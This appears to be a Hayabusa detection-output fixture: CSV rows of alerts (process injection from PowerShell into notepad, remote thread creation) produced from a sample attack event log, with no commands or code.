+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.161 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.176 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.192 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.208 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.223 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.239 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.270 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.286 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.301 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.317 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.348 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.364 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.380 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.395 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.426 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.442 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.489 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.505 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.520 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.536 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.551 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
+2019-05-19 02:16:17.567 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
